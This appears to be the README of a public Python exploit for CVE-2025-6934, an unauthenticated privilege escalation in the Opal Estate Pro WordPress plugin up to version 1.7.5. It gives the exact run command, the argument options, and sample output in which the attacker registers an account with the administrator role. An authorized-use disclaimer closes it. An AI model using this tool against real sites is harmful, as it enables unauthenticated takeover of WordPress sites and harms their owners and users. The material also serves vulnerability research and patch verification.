
Opal Estate Pro <= 1.7.5 - Unauthenticated Privilege Escalation
The Opal Estate Pro – Property Management and Submission plugin for WordPress, used by the FullHouse - Real Estate Responsive WordPress Theme, is vulnerable to Privilege Escalation in all versions up to and including 1.7.5.
This Python exploit automates the privilege escalation process by:
readme.txt.python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234
[•] Plugin Version Check:
[+] Vulnerable version detected: 1.7.5
[•] Exploit Attempt Started
[+] Nonce Found: 70dd70630b
[+] HTTP Status: 200
[✔] Exploit Successful!
--------------------------
Username : nxploitedadmin
Email : [email protected]
Password : nxp1234
Role : administrator
--------------------------
Exploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD
CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g., http://site.com/path/)
-mail, --newmail NEWMAIL
Email to register as admin
-password, --newpassword NEWPASSWORD
Password for new admin user
This script is for educational and authorized security testing purposes only.
Unauthorized use of this tool against targets without consent is strictly prohibited.
By: Khaled_alenazi (Nxploited)